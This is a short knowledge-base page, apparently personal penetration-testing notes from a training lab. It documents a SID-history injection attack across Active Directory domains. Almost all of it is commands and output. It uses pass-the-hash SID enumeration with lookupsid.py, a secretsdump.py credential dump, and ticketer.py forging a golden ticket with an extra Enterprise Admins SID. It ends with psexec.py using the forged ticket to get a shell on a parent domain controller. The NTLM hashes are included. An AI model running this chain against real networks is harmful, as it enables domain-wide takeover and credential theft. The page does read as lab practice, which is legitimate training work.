Malleum Knowledge Base

SID injection Attack

3 min read

lookupsid

 
└─$ proxychains -f proxychains4.conf lookupsid.py dev.admin.offshore.com/Administrator@172.16.2.6 -hashes c61f43b6a4db2676714713836b7d2ea6:c61f43b6a4db2676714713836b7d2ea6
[proxychains] config file found: proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.1.dev1+20230502.194317.86a9fffe - Copyright 2022 Fortra
 
[*] Brute forcing SIDs at 172.16.2.6
[*] StringBinding ncacn_np:172.16.2.6[\pipe\lsarpc]
[proxychains] Strict chain  ...  127.0.0.1:6000  ...  172.16.2.6:445  ...  OK
[*] Domain SID is: S-1-5-21-1416445593-394318334-2645530166
500: DEV\Administrator (SidTypeUser)
501: DEV\Guest (SidTypeUser)
502: DEV\krbtgt (SidTypeUser)
503: DEV\DefaultAccount (SidTypeUser)
512: DEV\Domain Admins (SidTypeGroup)
513: DEV\Domain Users (SidTypeGroup)
514: DEV\Domain Guests (SidTypeGroup)
515: DEV\Domain Computers (SidTypeGroup)
516: DEV\Domain Controllers (SidTypeGroup)
517: DEV\Cert Publishers (SidTypeAlias)
520: DEV\Group Policy Creator Owners (SidTypeGroup)
521: DEV\Read-only Domain Controllers (SidTypeGroup)
522: DEV\Cloneable Domain Controllers (SidTypeGroup)
525: DEV\Protected Users (SidTypeGroup)
526: DEV\Key Admins (SidTypeGroup)
553: DEV\RAS and IAS Servers (SidTypeAlias)
571: DEV\Allowed RODC Password Replication Group (SidTypeAlias)
572: DEV\Denied RODC Password Replication Group (SidTypeAlias)
1000: DEV\DC02$ (SidTypeUser)
1101: DEV\DnsAdmins (SidTypeAlias)
1102: DEV\DnsUpdateProxy (SidTypeGroup)
1103: DEV\ADMIN$ (SidTypeUser)
1104: DEV\WS03$ (SidTypeUser)
1105: DEV\IIS_dev (SidTypeUser)
1108: DEV\CORP_admins (SidTypeAlias)
1109: DEV\CORP$ (SidTypeUser)
1604: DEV\joe (SidTypeUser)
                                
 
└─$ proxychains -f proxychains4.conf lookupsid.py dev.admin.offshore.com/Administrator@172.16.3.5 -hashes c61f43b6a4db2676714713836b7d2ea6:c61f43b6a4db2676714713836b7d2ea6                                                    
[proxychains] config file found: proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.1.dev1+20230502.194317.86a9fffe - Copyright 2022 Fortra
 
[*] Brute forcing SIDs at 172.16.3.5
[*] StringBinding ncacn_np:172.16.3.5[\pipe\lsarpc]
[proxychains] Strict chain  ...  127.0.0.1:6000  ...  172.16.3.5:445  ...  OK
[*] Domain SID is: S-1-5-21-1216317506-3509444512-4230741538
498: ADMIN\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: ADMIN\Administrator (SidTypeUser)
501: ADMIN\Guest (SidTypeUser)
502: ADMIN\krbtgt (SidTypeUser)
503: ADMIN\DefaultAccount (SidTypeUser)
512: ADMIN\Domain Admins (SidTypeGroup)
513: ADMIN\Domain Users (SidTypeGroup)
514: ADMIN\Domain Guests (SidTypeGroup)
515: ADMIN\Domain Computers (SidTypeGroup)
516: ADMIN\Domain Controllers (SidTypeGroup)
517: ADMIN\Cert Publishers (SidTypeAlias)
518: ADMIN\Schema Admins (SidTypeGroup)
519: ADMIN\Enterprise Admins (SidTypeGroup)
520: ADMIN\Group Policy Creator Owners (SidTypeGroup)
521: ADMIN\Read-only Domain Controllers (SidTypeGroup)
522: ADMIN\Cloneable Domain Controllers (SidTypeGroup)
525: ADMIN\Protected Users (SidTypeGroup)
526: ADMIN\Key Admins (SidTypeGroup)
527: ADMIN\Enterprise Key Admins (SidTypeGroup)
553: ADMIN\RAS and IAS Servers (SidTypeAlias)
571: ADMIN\Allowed RODC Password Replication Group (SidTypeAlias)
572: ADMIN\Denied RODC Password Replication Group (SidTypeAlias)
1000: ADMIN\DC03$ (SidTypeUser)
1101: ADMIN\DnsAdmins (SidTypeAlias)
1102: ADMIN\DnsUpdateProxy (SidTypeGroup)
1107: ADMIN\MS01$ (SidTypeUser)
1108: ADMIN\WS04$ (SidTypeUser)
1114: ADMIN\MSSP (SidTypeAlias)
3101: ADMIN\DEV$ (SidTypeUser)
3104: ADMIN\CLIENT$ (SidTypeUser)
3105: ADMIN\ADMIN$$$ (SidTypeAlias)
3113: ADMIN\bankvault (SidTypeUser)
 
 proxychains -f proxychains4.conf secretsdump.py dev.admin.offshore.com/Administrator@172.16.2.6 -hashes c61f43b6a4db2676714713836b7d2ea6:c61f43b6a4db2676714713836b7d2ea6 
 
 
└─$ proxychains -f proxychains4.conf ticketer.py -nthash 9404def404bc198fd9830a3483869e78 -domain dev.admin.offshore.com -domain-sid S-1-5-21-1416445593-394318334-2645530166 -extra-sid S-1-5-21-1216317506-3509444512-4230741538-519 Administrator       
 
 
 
 
[proxychains] config file found: proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.1.dev1+20230502.194317.86a9fffe - Copyright 2022 Fortra
 
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for dev.admin.offshore.com/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncAsRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncASRepPart
[*] Saving ticket in Administrator.ccache
 
export KRB5CCNAME=Administrator.ccache


 
└─$ proxychains -f proxychains4.conf psexec.py dev.admin.offshore.com/Administrator@dc03.admin.offshore.com -k -no-pass -target-ip 172.16.3.5

Graph View